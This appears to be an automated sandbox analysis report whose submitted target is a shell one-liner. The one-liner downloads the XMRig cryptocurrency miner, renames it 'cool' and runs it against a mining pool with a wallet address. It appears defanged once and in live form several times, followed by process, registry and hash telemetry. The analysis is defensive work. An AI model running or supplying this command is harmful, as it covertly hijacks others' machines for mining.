hxxp://wget hxxps://github[.]com/xmrig/xmrig/releases/download/v6[.]21[.]3/xmrig-6[.]21[.]3-linux-static-x64[.]tar[.]gz && tar -xz -f xmrig-6[.]21[.]3-linux-static-x64[.]tar[.]gz && cd xmrig-6[.]21[.]3 && mv xmrig cool && [.]/cool -o xmrpool[.]eu[:]3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3

Analysis

max time kernel
652s
max time network
657s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
10-10-2024 06:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz && tar -xz -f xmrig-6.21.3-linux-static-x64.tar.gz && cd xmrig-6.21.3 && mv xmrig cool && ./cool -o xmrpool.eu:3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3

Score

6^/10

discovery

Malware Config

Signatures

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
137	whoer.net
138	whoer.net
139	whoer.net
187	api.ipify.org
188	api.ipify.org
136	whoer.net

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133730143285807662"	chrome.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4288	chrome.exe
4288	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe
Token: SeShutdownPrivilege	4472	chrome.exe
Token: SeCreatePagefilePrivilege	4472	chrome.exe

Suspicious use of FindShellTrayWindow 42 IoCs

pid	Process
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe

Suspicious use of SendNotifyMessage 40 IoCs

pid	Process
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe
4472	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4472 wrote to memory of 4792	4472	chrome.exe	70
PID 4472 wrote to memory of 4792	4472	chrome.exe	70
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 728	4472	chrome.exe	72
PID 4472 wrote to memory of 1648	4472	chrome.exe	73
PID 4472 wrote to memory of 1648	4472	chrome.exe	73
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74
PID 4472 wrote to memory of 4976	4472	chrome.exe	74

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz && tar -xz -f xmrig-6.21.3-linux-static-x64.tar.gz && cd xmrig-6.21.3 && mv xmrig cool && ./cool -o xmrpool.eu:3333 -u 4BCzRFseZPce3GUMsqGEHjeSgzzBhE3C72JdGdapz3kgdWpq4ri7NbNfTKCotSdAP2a6c6f4Qq3XHWRMJX1EYJnrDrSeJG3
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8fe089758,0x7ff8fe089768,0x7ff8fe089778
  2⤵
  PID:4792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1536 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:2
  2⤵
  PID:728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1840 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:1648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:4976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2584 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:1
  2⤵
  PID:240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2616 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:1
  2⤵
  PID:4768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3756 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:1
  2⤵
  PID:4968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3672 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:1
  2⤵
  PID:4260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4248 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:1936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3800 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:4736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3760 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=2808 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:1
  2⤵
  PID:3684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4900 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:1
  2⤵
  PID:4224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4908 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:4128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5112 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:5000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5264 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:2264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:2340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3896 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:4468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=2796 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:1
  2⤵
  PID:1368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4384 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3172 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:1
  2⤵
  PID:2820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3904 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:1
  2⤵
  PID:4800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1652 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:3744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3092 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:4248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=4284 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:1
  2⤵
  PID:4340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1940 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:4520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4084 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:8
  2⤵
  PID:3192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=2376 --field-trial-handle=1784,i,909861048130300758,2530328714115093688,131072 /prefetch:1
  2⤵
  PID:3268

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
5592b85715430640a0ef8182132001c6

SHA1
675302901887e5f0264be4de1b65d0002c416234

SHA256
49653061d601bf45c6f84fb7a4f9bc5efc7597956abeb632c2e95522cdf383ed

SHA512
abcdfcc6b49f285988b134ea8c9cb11d582e185b167d13f66ce01feaec9bd2c2e7ee8d51dee50859adf9c395adeeb97a248d8640fa85c965d9ca041e69f1a2a5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
f203882d7d62a9f5735f604cc8fb51e2

SHA1
6b63a54735c90998131375c74a89148d67916ad2

SHA256
c9e07d531fa1c77b5ca1f3d35b14feac1631f684a44b09c82e84c6029f0b5596

SHA512
d7f6ea853a6c6a05892b2dccee24f3733066b76266cbbd3ab3b43b4fddae27642c10dee0a6f115a83c928461cb432992cbdccf2e204da9caf50987e504b97273

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
d86f8c74cecc0d2132520f808de700b8

SHA1
1b9491a80426c79cf1eac3a8574804c5e94fc4f3

SHA256
2b54d3d93ebddb2ab135308ca41311c3d369513da4f826b45acc2742bf86be46

SHA512
b8260e5bc5ddba818687b1a38bc2c40c75b040d23baa3337db8514415bb5d20680b9e28ebbe5ff4f590ad484bf6c3204bbfe6c181bb0b78154a2bc4f66529840

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
539B

MD5
e7525de6b1e40ee9d0a0b01b0dfc4143

SHA1
be71fa7caaa1e9b82f26d657908b35b816742f69

SHA256
800647b2c3b19337d85cf15dc0b0671d3c5c6fc025d25c00ce1909e6a75215c9

SHA512
159689af4f484581dae04fbc16418ef164aa51bf9815156a2f04aaab3a12db6022c9edbb6b352134270e9959b2bf9975df94d677886c47b5e6a6adb7688b600d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
537B

MD5
2e4dd2cf912f8e4695551460126eb4c4

SHA1
cc4ae70d4e4306d2d987427d7d4d51bc3e240607

SHA256
84bddaa56f955722ffcabcb5c2958602ef2d6b0d0eff9a5432e069cabfa20b99

SHA512
6ec689945deee834fa33e9232d2d7dc1bcb2bfd2240bc3dbff7acac4eb362fcff628d5cc16bc1801d72fc7f01d7791e2b9d3415ed4b839b1f4670965467c701d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
6KB

MD5
201a3a541282e7421515b27ee0cf4fb2

SHA1
b85bb0742022d8242636830e549c224888265b65

SHA256
0162f873882ef729fb3e85a9255350f4303a60c9306a518f675a0472f8c7ebb1

SHA512
edc83a8d70ea40674d084644623f47c3473f76e4c96a16ce7c9f021cda9a2220a5c49460219cd6274ac48916c98054f9707ed12e28323ed8b1c5712f5737af61

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
537B

MD5
e76ee4cd66666f2217177a4010fd61eb

SHA1
6bf585735a836435c18abfc9433a21b34a484271

SHA256
077b71b01d896cefbef5cb3f31bfbb25958742dc63c574579c37880e9d20282c

SHA512
f18f9ef560a1b3b05087ca537069f56b2f11151e59ccc2c9f5b4862e8cae2c5e8eb89bb79e55b2f58b349396ffaf2ffa7016a9e39aea8337688d54c48324047b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
537B

MD5
558e56324717cc4aaebb39ad91064df7

SHA1
3aed185088971beb8604d814ed42f0514c5c85d0

SHA256
c0cbd07c67104f71affb181cead9ddeb386b9b78f03b92d62c397e5fbf37c873

SHA512
ecae7d29db059a1c0903683a8499e3307edd5adf057a3429e42282ebbf8897243b8cf6327dd94aa0deb03ce28c659300ec9b65d5f8a80ae83df82aa8e23fa633

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
539B

MD5
7289bd7b747f89e103e9e3438323daef

SHA1
fa46cf21a9f6a6469ccf15e1033008dd3f874fed

SHA256
e3d734637ec78e09e4b2b7ace834f113d4525317b010ca6f2a3223e1915650cf

SHA512
48cd638f3b970d9f2367a6d06a43d1894ca872415359fb12cddf18b92779a6e3544272bccf3f3245abe016f2253b09f4cf0381e3f896fe1b94891fd678b9b612

Download Submit
